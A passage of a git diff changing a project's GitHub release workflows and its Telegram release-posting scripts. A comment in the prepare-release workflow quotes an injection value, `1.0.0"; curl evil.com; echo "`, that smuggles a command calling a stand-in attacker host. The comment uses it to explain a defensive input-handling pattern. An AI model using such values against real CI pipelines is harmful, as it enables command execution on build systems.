+        username_link = f"https://t.me/{username}" if username else ""
+        invite_link = os.environ.get("FILES_CHANNEL_INVITE", "").strip()
+        print()
+        print(f"posting cross-link to main channel:")
+        print(f"  post link: {link}")
+        if username_link:
+            print(f"  channel username link: {username_link}")
+        if invite_link:
+            print(f"  channel invite link:   {invite_link}")
+        ok = post_main_channel_pointer(
+            bot_token,
+            main_chat_id,
+            link,
+            args.version,
+            args.hashtag,
+            channel_username_link=username_link,
+            channel_invite_link=invite_link,
+            english_notes_brief=english_brief,
+        )
+        if not ok:
+            failures += 1
+    elif main_chat_id and announce_msg_id is None:
+        print()
+        print(
+            "  !! MAIN_CHAT_ID is set but announcement message_id is None — "
+            "skipping cross-link (no anchor to point at).",
+            flush=True,
+        )
+        failures += 1
+    else:
+        print()
+        print("  MAIN_CHAT_ID not set, skipping cross-link", flush=True)
+
+    print()
+    if failures:
+        print(f"DONE with {failures} failure(s) out of {len(files)}", flush=True)
+        return 1
+    print(f"DONE — {len(files)} files posted successfully", flush=True)
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
diff --git a/.github/scripts/telegram_release_notify.py b/.github/scripts/telegram_release_notify.py
deleted file mode 100755
index da04d8b8..00000000
--- a/.github/scripts/telegram_release_notify.py
+++ /dev/null
@@ -1,366 +0,0 @@
-#!/usr/bin/env python3
-"""
-Post a CI-built Android APK to the project Telegram channel on each
-release tag, followed by a reply-threaded changelog message with
-Persian + English bullets in <blockquote> blocks.
-
-Called from the `telegram:` job in `.github/workflows/release.yml`.
-Environment:
-    BOT_TOKEN   Telegram bot token (repo secret TELEGRAM_BOT_TOKEN)
-    CHAT_ID     Numeric chat id, e.g. -1002282061190 (repo secret
-                TELEGRAM_CHAT_ID)
-Arguments:
-    --apk        path to the APK file to upload
-    --version    bare version string, e.g. "1.1.0"
-    --repo       "owner/repo"
-    --changelog  path to docs/changelog/vX.Y.Z.md; split on a line
-                 that is exactly "---" — anything before is Persian,
-                 anything after is English. Missing file = only the
-                 APK is posted (no reply).
-
-Why Python over curl: curl's `-F name=value` multipart spec treats
-`<file` as "read from file" and `@file` as "upload file". Our HTML
-captions contain literal `<b>` tags, which triggers the file-read
-path and exits 26 "Failed to open/read local data". urllib has no
-such behavior.
-
-Telegram quirks we deliberately handle:
-  - Captions max out at 1024 chars, so the APK caption is short
-    (title + sha256 + repo + release URL) and the real changelog
-    goes in a reply-threaded message (sendMessage has no practical
-    length limit).
-  - sendDocument content-type defaults to application/octet-stream
-    for unknown extensions — we pass .apk with
-    application/vnd.android.package-archive so channel previews
-    label it as an Android package, not a generic file.
-"""
-import argparse
-import hashlib
-import http.client
-import json
-import os
-import re
-import ssl
-import sys
-import uuid
-from pathlib import Path
-
-
-def parse_changelog(path: str) -> tuple[str, str]:
-    """Return (persian_body, english_body). Blank strings if file missing."""
-    p = Path(path)
-    if not p.is_file():
-        return "", ""
-    body = p.read_text(encoding="utf-8")
-    # Strip a leading HTML comment block if present — the changelog
-    # template uses <!-- ... --> to document the format for editors;
-    # we don't want that echoed to Telegram.
-    body = re.sub(r"^\s*<!--.*?-->\s*", "", body, count=1, flags=re.S)
-    fa, sep, en = body.partition("\n---\n")
-    if not sep:
-        # No separator — treat everything as Persian (content-language
-        # is a project preference rather than a hard rule).
-        return body.strip(), ""
-    return fa.strip(), en.strip()
-
-
-# Telegram caption hard-cap is 1024 chars. The fixed parts of our caption
-# (title + SHA hash + two-link footer with their preambles) sum to roughly
-# 470 chars on a typical version string. That leaves ~550 chars for the
-# release-note section before we'd start losing the trailing release URL.
-# Keep the budget conservative so a long version string or a slightly
-# longer hash representation doesn't push us over.
-CAPTION_FA_NOTE_BUDGET = 500
-
-
-def _md_links_to_html(text: str) -> str:
-    """Convert `[label](url)` markdown links to `<a href="url">label</a>`.
-
-    Telegram's HTML parse mode renders `<a>` as clickable but treats
-    markdown verbatim, so an unconverted `[#160](https://…)` appears as
-    that literal string in the channel post — both ugly and wasteful of
-    caption budget. The HTML form is shorter visually (`#160` vs the
-    full URL), still clickable, and counts the same toward Telegram's
-    1024-char limit. Inline `code` (`backtick-quoted`) is also
-    translated to `<code>…</code>` since markdown backticks render
-    literally too.
-    """
-    text = re.sub(
-        r"\[([^\]]+)\]\(([^)]+)\)",
-        lambda m: f'<a href="{m.group(2)}">{m.group(1)}</a>',
-        text,
-    )
-    text = re.sub(r"`([^`\n]+)`", r"<code>\1</code>", text)
-    # Bold (**…**) is rare in our changelog but happens — convert to <b>.
-    text = re.sub(r"\*\*([^*\n]+)\*\*", r"<b>\1</b>", text)
-    return text
-
-
-def _extract_headlines(fa_section: str) -> str:
-    """For each `• …: …` bullet, keep the headline part and drop the
-    elaboration.
-
-    Our changelog convention writes each bullet as one of:
-      • headline: full explanation
-      • headline ([#NN](url)): full explanation
-      • headline (issue ref): full explanation
-
-    The headline is everything up to the `: ` (colon + space) that ends
-    the leading clause. Naively searching for the first `:` lands inside
-    `https:` URLs of the markdown link form — instead we search from the
-    end of the parenthesized-issue-ref (if any) for the first `: `, or
-    fall back to the first `: ` in the line.
-
-    Headlines stay on the FA caption; the explanation is preserved in
-    the docs/changelog/ file and (optionally) the reply-threaded message
-    posted via --with-changelog.
-
-    Returns a newline-joined string of `• <headline>` lines.
-    """
-    headlines: list[str] = []
-    for line in fa_section.splitlines():
-        if not line.startswith("• "):
-            continue
-        body = line[2:]  # drop "• "
-        # Prefer cutting at "): " — the close of the parenthesized ref
-        # followed by the convention colon + space. That's our actual
-        # bullet structure and avoids the false-positive `https:` cut.
-        cut_idx = body.find("): ")
-        if cut_idx > 0:
-            headline = body[: cut_idx + 1]  # keep the close paren
-        else:
-            # Fall back to ": " (colon + space) anywhere in the body.
-            # Adding the space requirement skips `https:` which is
-            # always followed by `/`.
-            cut_idx = body.find(": ")
-            headline = body[:cut_idx] if cut_idx > 0 else body
-        headlines.append(f"• {headline.rstrip()}")
-    return "\n".join(headlines)
-
-
-def build_caption_release_note(changelog_path: str) -> str:
-    """Build the Persian "what's new" block for the Telegram caption.
-
-    Pulls the FA section of `docs/changelog/v<ver>.md`, extracts just
-    the bullet headlines (before the first `:` of each bullet) so the
-    note is compact, converts markdown links/code to Telegram HTML for
-    clickability, and wraps in a `<blockquote>`. Falls back to the full
-    FA section if the headlines extraction yields nothing (e.g. a
-    changelog that doesn't follow our `• headline: details` convention).
-
-    If the result still exceeds CAPTION_FA_NOTE_BUDGET, truncate at a
-    bullet boundary with a trailing `…`. In practice the headlines-only
-    form fits comfortably for any reasonable release note.
-    """
-    fa, _en = parse_changelog(changelog_path)
-    if not fa:
-        return ""
-    headlines = _extract_headlines(fa)
-    note = headlines if headlines else fa.strip()
-    note = _md_links_to_html(note)
-    if len(note) > CAPTION_FA_NOTE_BUDGET:
-        truncated = note[:CAPTION_FA_NOTE_BUDGET]
-        last_bullet = truncated.rfind("\n•")
-        if last_bullet > 0:
-            note = truncated[:last_bullet].rstrip() + "\n…"
-        else:
-            note = truncated.rstrip() + "…"
-    return f"<blockquote>{note}</blockquote>"
-
-
-def sha256_of(path: str) -> str:
-    h = hashlib.sha256()
-    with open(path, "rb") as f:
-        for chunk in iter(lambda: f.read(1024 * 1024), b""):
-            h.update(chunk)
-    return h.hexdigest()
-
-
-def tg_request(method: str, token: str, *, body: bytes, content_type: str) -> dict:
-    """POST `body` to https://api.telegram.org/bot<token>/<method>."""
-    conn = http.client.HTTPSConnection(
-        "api.telegram.org", context=ssl.create_default_context()
-    )
-    conn.request(
-        "POST",
-        f"/bot{token}/{method}",
-        body=body,
-        headers={"Content-Type": content_type, "Content-Length": str(len(body))},
-    )
-    resp = conn.getresponse()
-    raw = resp.read()
-    try:
-        data = json.loads(raw)
-    except json.JSONDecodeError:
-        raise SystemExit(f"Telegram {method}: non-JSON response ({resp.status}): {raw!r}")
-    if not data.get("ok"):
-        raise SystemExit(f"Telegram {method} failed: {data}")
-    return data["result"]
-
-
-def send_document(token: str, chat_id: str, apk_path: str, caption: str) -> int:
-    """Upload the APK file with a short HTML caption. Returns message_id."""
-    boundary = "----" + uuid.uuid4().hex
-    with open(apk_path, "rb") as f:
-        file_bytes = f.read()
-
-    def text_field(name: str, value: str) -> bytes:
-        return (
-            f"--{boundary}\r\n"
-            f'Content-Disposition: form-data; name="{name}"\r\n\r\n'
-            f"{value}\r\n"
-        ).encode("utf-8")
-
-    def file_field(name: str, filename: str, content: bytes) -> bytes:
-        head = (
-            f"--{boundary}\r\n"
-            f'Content-Disposition: form-data; name="{name}"; filename="{filename}"\r\n'
-            # Proper MIME type — makes the Telegram client show the APK
-            # with the Android package icon and honour its size/name.
-            f"Content-Type: application/vnd.android.package-archive\r\n\r\n"
-        ).encode("utf-8")
-        return head + content + b"\r\n"
-
-    body = (
-        text_field("chat_id", chat_id)
-        + text_field("caption", caption)
-        + text_field("parse_mode", "HTML")
-        + file_field("document", os.path.basename(apk_path), file_bytes)
-        + f"--{boundary}--\r\n".encode("utf-8")
-    )
-
-    result = tg_request(
-        "sendDocument",
-        token,
-        body=body,
-        content_type=f"multipart/form-data; boundary={boundary}",
-    )
-    return int(result["message_id"])
-
-
-def send_reply(token: str, chat_id: str, text: str, reply_to: int) -> None:
-    """Post a text message as a reply to the APK message."""
-    from urllib.parse import urlencode
-
-    body = urlencode(
-        {
-            "chat_id": chat_id,
-            "text": text,
-            "parse_mode": "HTML",
-            "reply_to_message_id": str(reply_to),
-        }
-    ).encode()
-    tg_request(
-        "sendMessage",
-        token,
-        body=body,
-        content_type="application/x-www-form-urlencoded",
-    )
-
-
-def main() -> int:
-    ap = argparse.ArgumentParser()
-    ap.add_argument("--apk", required=True)
-    ap.add_argument("--version", required=True)
-    ap.add_argument("--repo", required=True)
-    ap.add_argument("--changelog", required=True,
-                    help="Path to docs/changelog/vX.Y.Z.md; only read when --with-changelog is passed.")
-    # Default: just the APK + short caption (title + SHA-256 + repo URL +
-    # release URL). The per-release Persian/English blockquote reply is
-    # opt-in via `--with-changelog` so routine releases don't flood the
-    # channel with bullet-point bodies. To re-enable for a specific tag:
-    # set the repo variable TELEGRAM_INCLUDE_CHANGELOG=true before pushing
-    # the tag (the workflow converts that into --with-changelog).
-    ap.add_argument("--with-changelog", action="store_true",
-                    help="Include the Persian+English changelog as a reply-threaded message.")
-    # Dry-run lets you verify the rendered caption locally without hitting
-    # Telegram. Useful when changing the brief-release-note budget /
-    # truncation logic — print, eyeball, push.
-    ap.add_argument("--dry-run", action="store_true",
-                    help="Render the caption and print it instead of posting. "
-                         "Skips token/chat_id checks.")
-    args = ap.parse_args()
-
-    if not args.dry_run:
-        token = os.environ.get("BOT_TOKEN", "")
-        chat_id = os.environ.get("CHAT_ID", "")
-        if not token or not chat_id:
-            print("TELEGRAM secrets not present, skipping post.")
-            return 0
-    else:
-        token = ""
-        chat_id = ""
-
-    ver = args.version
-    sha = sha256_of(args.apk)
-    # Brief Persian release-note above the links. Pulled from the FA
-    # half of `docs/changelog/v<ver>.md` so each release auto-includes
-    # what's new without manual edits to this script. Truncated to fit
-    # Telegram's 1024-char caption budget alongside title + SHA + the
-    # two-link footer.
-    fa_note = build_caption_release_note(args.changelog)
-
-    # Caption structure requested by the repo owner:
-    #   1. Title + SHA-256 (as before)
-    #   2. Brief Persian "what's new" note (extracted from changelog)
-    #   3. Persian preamble labelling the repo link as
-    #      "GitHub repo + full Persian guide"
-    #   4. Repo URL
-    #   5. Persian preamble labelling the release link as
-    #      "this version's release — desktop/router builds live here"
-    #   6. Release URL
-    # Keeps total well under Telegram's 1024-char caption limit.
-    caption_parts = [
-        f"<b>mhrv-rs Android v{ver}</b>",
-        "",
-        f"SHA-256: <code>{sha}</code>",
-    ]
-    if fa_note:
-        caption_parts.extend(["", fa_note])
-    caption_parts.extend([
-        "",
-        "مخزن گیتهاب  + مطالعه راهنمای کامل فارسی:",
-        f"https://github.com/{args.repo}",
-        "",
-        "لینک به این نسخه جهت دریافت نسخه های مربوط به مودم و کامپیوتر:",
-        f"https://github.com/{args.repo}/releases/tag/v{ver}",
-    ])
-    caption = "\n".join(caption_parts)
-
-    if args.dry_run:
-        print(f"--- DRY RUN: caption ({len(caption)} chars) ---")
-        print(caption)
-        print(f"--- END DRY RUN ---")
-        if args.with_changelog:
-            fa, en = parse_changelog(args.changelog)
-            print(f"\nWould reply with changelog "
-                  f"(fa: {len(fa) if fa else 0} chars, "
-                  f"en: {len(en) if en else 0} chars)")
-        return 0
-
-    doc_mid = send_document(token, chat_id, args.apk, caption)
-    print(f"sendDocument OK, message_id={doc_mid}")
-
-    if not args.with_changelog:
-        print("Changelog reply disabled (default). Pass --with-changelog to include.")
-        return 0
-
-    fa, en = parse_changelog(args.changelog)
-    if not fa and not en:
-        print(f"No changelog at {args.changelog}, skipping reply.")
-        return 0
-
-    parts = []
-    if fa:
-        parts.append(f"<blockquote>{fa}</blockquote>")
-    if en:
-        parts.append(f"<blockquote>{en}</blockquote>")
-    reply = "\n\n".join(parts)
-
-    send_reply(token, chat_id, reply, doc_mid)
-    print("Reply OK")
-    return 0
-
-
-if __name__ == "__main__":
-    sys.exit(main())
diff --git a/.github/workflows/prepare-release.yml b/.github/workflows/prepare-release.yml
new file mode 100644
index 00000000..2eb83720
--- /dev/null
+++ b/.github/workflows/prepare-release.yml
@@ -0,0 +1,296 @@
+# Prepare a new release: bump version strings, prefill the changelog
+# stub from release-drafter's draft, and open a PR. After the PR is
+# merged, you push the `v<version>` tag manually and `release.yml`
+# takes over (matrix build → GitHub release → Telegram notify).
+#
+# Triggered manually from the Actions UI or via:
+#   gh workflow run prepare-release.yml -f version=1.6.6
+#
+# What it bumps in the PR:
+#   - Cargo.toml                        version = "X.Y.Z"
+#   - Cargo.lock                        mhrv-rs entry's version
+#   - android/app/build.gradle.kts      versionName = "X.Y.Z"
+#                                       versionCode = previous + 1
+#
+# What it leaves alone:
+#   - tunnel-node/Cargo.toml — versioned independently from the app.
+#     The docker tunnel image is tagged from the git release tag (not
+#     from this Cargo.toml), so we don't need to touch it.
+#
+# What it prefills in docs/changelog/v<version>.md:
+#   - Persian section: an inline `[FA] translate ...` placeholder line.
+#     Visible if not edited — ships into the release page as an obvious
+#     marker rather than a quiet comment leak.
+#   - Separator: `---`
+#   - English section: bullets pulled from release-drafter's `next`
+#     draft release, each suffixed with `: <expand>` to remind you to
+#     add an explanatory clause in the project's existing
+#     `• headline (#NN): full explanation` style. If no draft exists
+#     yet (e.g. immediately after installing release-drafter, before
+#     any PRs have merged), the English section is empty and you fill
+#     it in by hand.
+
+name: prepare-release
+
+on:
+  workflow_dispatch:
+    inputs:
+      version:
+        description: 'New version to release (without the leading v). Example: 1.6.6'
+        required: true
+        type: string
+
+permissions:
+  contents: write
+  pull-requests: write
+
+jobs:
+  bump:
+    runs-on: ubuntu-latest
+    steps:
+      # Always check out main, regardless of which branch the dispatch
+      # was fired from. workflow_dispatch can be triggered from any ref;
+      # without an explicit `ref:` the version bumps would land on top
+      # of whatever branch the dispatcher had checked out, and the
+      # resulting PR would carry that branch's diffs alongside the bumps.
+      - uses: actions/checkout@v4
+        with:
+          ref: main
+          fetch-depth: 0  # need tag history for the duplicate-tag check below
+
+      - name: Validate version
+        id: ver
+        env:
+          # Pass the dispatch input through an env var rather than
+          # `${{ inputs.version }}` interpolation. GitHub interpolates
+          # the expression *before* the shell parses the script, so a
+          # value like `1.0.0"; curl evil.com; echo "` would execute
+          # before the regex check below ever ran. workflow_dispatch
+          # is gated to write-access users so practical risk is low,
+          # but this is the pattern GitHub's own docs recommend for
+          # defense in depth.
+          INPUT_VERSION: ${{ inputs.version }}
+        run: |
+          set -euo pipefail
+          VER="$INPUT_VERSION"
+          VER="${VER#v}"
+          if ! [[ "$VER" =~ ^[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
+            echo "::error::version '$VER' is not in X.Y.Z format"
+            exit 1
+          fi
+          if git rev-parse "v${VER}" >/dev/null 2>&1; then
+            echo "::error::tag v${VER} already exists; pick a different version"
+            exit 1
+          fi
+          BRANCH="release/v${VER}"
+          if git ls-remote --exit-code --heads origin "$BRANCH" >/dev/null 2>&1; then
+            echo "::error::branch $BRANCH already exists on origin; delete it or pick a different version"
+            exit 1
+          fi
+          echo "version=${VER}" >> "$GITHUB_OUTPUT"
+          echo "branch=${BRANCH}" >> "$GITHUB_OUTPUT"
+
+      - name: Bump Cargo.toml + Cargo.lock
+        env:
+          NEW_VER: ${{ steps.ver.outputs.version }}
+        run: |
+          set -euo pipefail
+          # Edit both files via Python so we anchor on the `name = "mhrv-rs"`
+          # line and only touch the package's own version, not unrelated
+          # `version = "..."` lines elsewhere in the lockfile.
+          python3 <<'PY'
+          import os, re, pathlib, sys
+          ver = os.environ["NEW_VER"]
+          for path in ("Cargo.toml", "Cargo.lock"):
+              p = pathlib.Path(path)
+              src = p.read_text()
+              new = re.sub(
+                  r'(name = "mhrv-rs"\nversion = ")[0-9.]+(")',
+                  rf'\g<1>{ver}\g<2>',
+                  src,
+                  count=1,
+              )
+              if new == src:
+                  sys.exit(f"ERROR: mhrv-rs version line not found in {path}")
+              p.write_text(new)
+              print(f"{path} -> {ver}")
+          PY
+
+      - name: Bump android versionName + versionCode
+        env:
+          NEW_VER: ${{ steps.ver.outputs.version }}
+        run: |
+          set -euo pipefail
+          # versionCode increments by 1 on every release; versionName mirrors
+          # the Cargo version. Both live in android/app/build.gradle.kts.
+          python3 <<'PY'
+          import os, re, pathlib, sys
+          ver = os.environ["NEW_VER"]
+          p = pathlib.Path("android/app/build.gradle.kts")
+          src = p.read_text()
+          m = re.search(r'versionCode\s*=\s*(\d+)', src)
+          if not m:
+              sys.exit("ERROR: versionCode not found in build.gradle.kts")
+          old_code = int(m.group(1))
+          new_code = old_code + 1
+          src = src[:m.start(1)] + str(new_code) + src[m.end(1):]
+          src, n = re.subn(
+              r'versionName\s*=\s*"[^"]+"',
+              f'versionName = "{ver}"',
+              src,
+              count=1,
+          )
+          if n == 0:
+              sys.exit("ERROR: versionName not found in build.gradle.kts")
+          p.write_text(src)
+          print(f"android/app/build.gradle.kts -> versionName={ver}, versionCode={old_code}->{new_code}")
+          PY
+
+      - name: Fetch release-drafter draft body
+        id: draft
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: |
+          set -euo pipefail
+          # release-drafter accumulates merged-PR titles into a draft tagged
+          # `next`. Pull its body for the changelog stub. `--repo` is set
+          # explicitly so we always look up the release in this repo even
+          # if a future maintainer ever creates a real `next` git tag in a
+          # fork or upstream. If no draft exists yet (release-drafter just
+          # installed, no PRs merged since), the `|| true` keeps us going
+          # with an empty body — you fill the English section by hand.
+          # `--jq 'select(.isDraft) | .body'` returns nothing if `next` is
+           # not a draft (i.e. someone manually published a release with
+           # tag `next`, or pushed a real `next` git tag with a release
+           # attached). On that path we treat it as "no draft" and fall
+           # through to the empty-body branch — better than echoing a
+           # surprise release body into the changelog stub.
+          BODY=$(gh release view next --repo "${{ github.repository }}" \
+                   --json body,isDraft --jq 'select(.isDraft) | .body' 2>/dev/null || true)
+          if [ -z "$BODY" ]; then
+            echo "::notice::no release-drafter 'next' draft found; English section will be empty"
+          else
+            echo "::notice::pulled $(printf '%s' "$BODY" | wc -l) lines from draft release"
+          fi
+          # Multiline outputs need a heredoc-style delimiter — pick one that
+          # cannot appear in a release-drafter bullet line.
+          {
+            echo 'body<<__DRAFT_BODY_EOF__'
+            printf '%s\n' "$BODY"
+            echo '__DRAFT_BODY_EOF__'
+          } >> "$GITHUB_OUTPUT"
+
+      - name: Write changelog stub
+        env:
+          NEW_VER: ${{ steps.ver.outputs.version }}
+          DRAFT_BODY: ${{ steps.draft.outputs.body }}
+        run: |
+          set -euo pipefail
+          # Build the file with shell `echo`/`printf` (not a YAML-level
+          # heredoc with $-double-curly interpolation) so backticks, dollar
+          # signs, or EOF tokens in the draft body can't break us.
+          #
+          # Why no TODO/instructional <!-- comments -->:
+          # release.yml strips leading <!-- comment --> blocks from the
+          # file before publishing the GitHub Release body, and the
+          # Telegram script does the same — both via a regex that handles
+          # multiple consecutive comments. But relying on stripping is
+          # brittle: a maintainer adding a new comment with a different
+          # shape (multi-line, indented, etc.) could leak it. Instead we
+          # use VISIBLE placeholders below. If the maintainer forgets to
+          # edit them, they ship as obvious `[FA]`/`<expand>` markers
+          # that an admin will spot in the release page within seconds.
+          mkdir -p docs/changelog
+          OUT="docs/changelog/v${NEW_VER}.md"
+          {
+            echo '<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->'
+            echo '[FA] translate the English bullets below into Persian and replace this line.'
+            echo ''
+            echo '---'
+            # Append the English section if release-drafter had any.
+            # Skip the printf entirely on empty so we don't leave a
+            # trailing blank line under `---`.
+            if [ -n "$DRAFT_BODY" ]; then
+              # Strip Conventional-Commit prefixes (`feat:`, `fix(android):`,
+              # etc.) from the start of each bullet headline. PR titles in
+              # this repo all carry these prefixes by convention, but the
+              # existing changelog style is verb-first ("Add X" / "Fix Y"),
+              # not type-first. Stripping here saves the maintainer one
+              # manual step per bullet; they still need to fix the verb
+              # tense (e.g. "added" → "Add") since GitHub PR titles tend
+              # to be past-tense and the changelog convention is imperative.
+              #
+              # Bullet shape from release-drafter is:
+              #   • feat(scope): title text ([#NN](url)): <expand>. Thanks @user
+              # After this sed:
+              #   • title text ([#NN](url)): <expand>. Thanks @user
+              printf '%s\n' "$DRAFT_BODY" \
+                | sed -E 's/^(• )(feat|fix|chore|docs?|refactor|perf|test|build|ci|style|revert)(\([^)]*\))?!?: */\1/i'
+            fi
+          } > "$OUT"
+          echo "wrote $OUT ($(wc -l < "$OUT") lines)"
+
+      # No `Ensure release-prep label exists` step here — release-drafter's
+      # workflow runs on every push to main, and its `Ensure autolabeler
+      # labels exist` step creates `release-prep` (along with the type:*
+      # labels). Since these workflow files only land via a push to main,
+      # release-drafter's bootstrap necessarily runs before the first
+      # prepare-release dispatch. If for some reason release-drafter is
+      # disabled, `gh pr create --label release-prep` below will fail with
+      # an actionable "label not found" — fix is to re-enable
+      # release-drafter or run `gh label create release-prep` once by hand.
+
+      - name: Commit, push, and open PR
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          NEW_VER: ${{ steps.ver.outputs.version }}
+          BRANCH: ${{ steps.ver.outputs.branch }}
+        run: |
+          set -euo pipefail
+          git config user.name "github-actions[bot]"
+          git config user.email "41898282+github-actions[bot]@users.noreply.github.com"
+          git checkout -b "$BRANCH"
+          git add Cargo.toml Cargo.lock android/app/build.gradle.kts \
+                  "docs/changelog/v${NEW_VER}.md"
+          git commit -m "release: prepare v${NEW_VER}"
+          git push -u origin "$BRANCH"
+
+          # Write the PR body to a file rather than fight nested heredoc
+          # escaping in the YAML run: block.
+          #
+          # IMPORTANT: this heredoc terminator (`MSG`) is INTENTIONALLY
+          # unquoted so that ${NEW_VER} and ${BRANCH} expand. Backticks
+          # in the body are escaped (\`) for the same reason. If you
+          # paste anything into the template below, watch out for `$(...)`
+          # and unescaped backticks — they will execute at workflow run
+          # time. To add a static block that should NOT interpolate, build
+          # it with a separate `<<'STATIC'` heredoc and concat afterward.
+          cat > /tmp/pr-body.md <<MSG
+          Automated version bump for **v${NEW_VER}**.
+
+          Bumped in this PR:
+          - \`Cargo.toml\` and \`Cargo.lock\` → ${NEW_VER}
+          - \`android/app/build.gradle.kts\` → versionName=${NEW_VER}, versionCode incremented by 1
+          - \`docs/changelog/v${NEW_VER}.md\` stubbed; English bullets prefilled from release-drafter's \`next\` draft
+
+          **Before merging — finish the changelog on this branch:**
+          1. Check out this branch locally: \`git fetch && git checkout ${BRANCH}\`
+          2. In \`docs/changelog/v${NEW_VER}.md\`:
+             - **Persian section:** replace the \`[FA] translate ...\` line with the Persian bullets above the \`---\` separator.
+             - **English section:** for each bullet, (a) fix the verb tense if needed (release-drafter passes through PR titles as-is, so "added" → "Add", "fixed" → "Fix"), and (b) replace \`<expand>\` with a short explanatory clause matching the project's \`• headline (#NN): full explanation\` style. The Conventional-Commit prefix (\`feat:\`/\`fix:\`/etc.) and the trailing \`. Thanks @author\` are already handled.
+          3. Commit + push to this branch so the PR includes the final bilingual changelog.
+
+          Any \`[FA]\` or \`<expand>\` markers left in the file will ship verbatim into the GitHub Release page and the Telegram post — they're intentionally visible, not hidden in HTML comments.
+
+          **After merging — ship it:**
+          1. \`git checkout main && git pull\`
+          2. \`git tag v${NEW_VER} && git push origin v${NEW_VER}\`
+          3. \`release.yml\` picks up the tag, builds artifacts, creates the GitHub release, and (if enabled) posts to Telegram.
+          MSG
+
+          gh pr create \
+            --base main \
+            --head "$BRANCH" \
+            --title "release: prepare v${NEW_VER}" \
+            --label "release-prep" \
+            --body-file /tmp/pr-body.md
diff --git a/.github/workflows/release-drafter.yml b/.github/workflows/release-drafter.yml
new file mode 100644
index 00000000..60e86445
--- /dev/null
+++ b/.github/workflows/release-drafter.yml
@@ -0,0 +1,65 @@
+# Updates the draft GitHub release on every push to main, and applies
+# Conventional-Commit-derived labels to incoming PRs. Config lives in
+# `.github/release-drafter.yml`. The drafter writes one line per merged
+# PR into a draft release tagged `next`; `prepare-release.yml` reads
+# that body when bumping versions so the English half of
+# `docs/changelog/v<ver>.md` is prefilled.
+#
+# Cost: one ubuntu-latest job per relevant PR/push event, single API
+# call, no compile, no tests. Zero contention with the self-hosted
+# Hetzner runners that release.yml uses.
+
+name: release-drafter
+
+on:
+  push:
+    branches: [main]
+  # `pull_request_target` runs in the context of the base branch (main),
+  # which is what the autolabeler needs to write labels back to PRs —
+  # including PRs from forks, which the regular `pull_request` event
+  # doesn't grant write permissions for. We never check out PR code
+  # in this workflow (only call the action), so the elevated context
+  # is safe.
+  pull_request_target:
+    types: [opened, reopened, synchronize, edited]
+
+permissions:
+  contents: read
+
+jobs:
+  update-draft:
+    permissions:
+      contents: write       # write the draft release object
+      pull-requests: write  # apply autolabeler labels to incoming PRs
+    runs-on: ubuntu-latest
+    steps:
+      # Ensure the labels referenced by .github/release-drafter.yml's
+      # autolabeler block all exist. release-drafter logs a warning and
+      # skips when it tries to apply a label that's missing — labelling
+      # itself doesn't fail, but exclude-labels and downstream filtering
+      # become silent no-ops. `gh label create … || true` is idempotent:
+      # creates on first run, exits with "already exists" on every run
+      # after that. Cheap (5 API calls per workflow run, no compile).
+      - name: Ensure autolabeler labels exist
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: |
+          set -euo pipefail
+          # Format: name|color|description (color without leading #).
+          while IFS='|' read -r name color desc; do
+            gh label create "$name" --color "$color" --description "$desc" \
+              --repo "${{ github.repository }}" 2>/dev/null || true
+          done <<'LABELS'
+          release-prep|ededed|Automated version-bump PR; excluded from release-drafter changelog
+          type: feature|a2eeef|feat: PR — auto-applied by release-drafter
+          type: fix|d73a4a|fix: PR — auto-applied by release-drafter
+          type: chore|cfd3d7|chore: PR — auto-applied by release-drafter
+          type: docs|0075ca|docs: PR — auto-applied by release-drafter
+          type: refactor|fbca04|refactor: PR — auto-applied by release-drafter
+          LABELS
+
+      - uses: release-drafter/release-drafter@v6
+        with:
+          config-name: release-drafter.yml
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 55caa258..51630c81 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -77,6 +77,17 @@ jobs:
           - target: x86_64-pc-windows-gnu
             os: windows-latest
             name: mhrv-rs-windows-amd64
+          # i686-pc-windows-msvc target was attempted in v1.7.7-v1.7.10
+          # to support Windows 7 32-bit users (#272, #318). Removed in
+          # v1.7.11 because keeping it on Rust 1.77.2 (last Win7-stable)
+          # is fundamentally fragile: every transitive crate that bumps
+          # its MSRV (e.g. `time` 0.3.47 needs Cargo manifest features
+          # only available in Rust 1.78+) breaks the build, and pinning
+          # transitives is brittle across releases. Win7 users should
+          # self-build per the README; the project no longer ships a
+          # prebuilt i686 Win7 binary. Replaced by the existing
+          # x86_64-pc-windows-gnu (windows-amd64) which covers ~99% of
+          # active Windows installs (incl. all WoA64 emulation).
           - target: x86_64-unknown-linux-musl
             os: [self-hosted, linux, x64, mhrv-build]
             name: mhrv-rs-linux-musl-amd64
@@ -138,9 +149,14 @@ jobs:
       # installed and the standard target triples are pre-added. It
       # still verifies the target is present and is cheap enough to keep
       # as a safety net.
-      - uses: dtolnay/rust-toolchain@stable
+      # Per-matrix-entry toolchain selection. Default is `stable` (latest)
+      # for every target except where `rust_toolchain` is explicitly pinned
+      # — currently just i686-pc-windows-msvc, which needs 1.77.2 to keep
+      # the Win7 binary loadable (Rust 1.78+ raised Windows MSRV to Win10).
+      - uses: dtolnay/rust-toolchain@master
         if: matrix.mipsel_softfloat != true
         with:
+          toolchain: ${{ matrix.rust_toolchain || 'stable' }}
           targets: ${{ matrix.target }}
 
       # Cache target/ + cargo registry across runs — this is the big
@@ -159,7 +175,11 @@ jobs:
       - uses: Swatinem/rust-cache@v2
         if: matrix.mipsel_softfloat != true
         with:
-          key: ${{ matrix.target }}
+          # Include toolchain in the cache key so a pinned-Rust target
+          # (i686-pc-windows-msvc on 1.77.2) doesn't collide with
+          # stable-Rust caches for other targets, and a future toolchain
+          # bump invalidates only the affected slot.
+          key: ${{ matrix.target }}-${{ matrix.rust_toolchain || 'stable' }}
           cache-bin: "false"
 
       # eframe needs a few system libs on Linux for window management, keyboard,
@@ -578,10 +598,33 @@ jobs:
         with:
           fetch-depth: 0
 
-      - uses: actions/download-artifact@v4
-        with:
-          path: dist
-          merge-multiple: true
+      # `actions/download-artifact@v4` has been intermittently flaking on
+      # this workflow with "5 retries exhausted" on a single artifact (~10
+      # of 13). Wrap it in a manual retry — usually the second attempt
